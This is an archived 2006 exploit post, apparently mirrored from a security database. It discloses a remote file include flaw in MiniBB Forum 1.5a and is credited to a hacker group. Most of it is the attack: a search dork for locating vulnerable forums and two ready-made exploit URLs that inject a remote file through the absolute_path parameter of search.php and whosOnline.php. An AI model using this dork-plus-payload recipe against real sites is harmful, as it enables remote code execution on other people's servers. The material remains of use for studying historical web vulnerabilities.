Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13588
HistoryJul 24, 2006 - 12:00 a.m.

MiniBB Forum <= 1.5a Remote File Include (search.php-whosOnline.php)

2006-07-2400:00:00
vulners.com
93

Title : MiniBB Forum <= 1.5a Remote File Include (search.php-whosOnline.php)
###############################################################################

Discovered By :::: {{AG-Spider & KaBaRa.HaCk .eGy}}


Affected software description :


Application  : MiniBB Forum 1.5a &#40;search.php-whosOnline.php&#41;version :  
version [ 1.5 ]
exploit          :Remote File Include
-----------------------------------------------------------------------------

dork        : &quot;Powered by miniBB 1.5 Β©&quot;
Exploit    :  http://www.example.com/search.php?absolute_path=[shellcode]?
                   
http://www.example.com/whosOnline.php?absolute_path=[shellcode]?

----------------------------------------------------------------------------

greetz4: [ Black-Code  -  KILLERxXx - Mr.SheHa - eGyPT GHosT]

c0natct us : KaBaRa.HaCk.eGy [ at ] HoTMail.CoM
                    AG-Spider [ at ] HoTMail.CoM

_________________________________________________________________
Windows Liveβ„’ Messenger has arrived. Click here to download it for free! 
http://imagine-msn.com/messenger/launch80/?locale=en-gb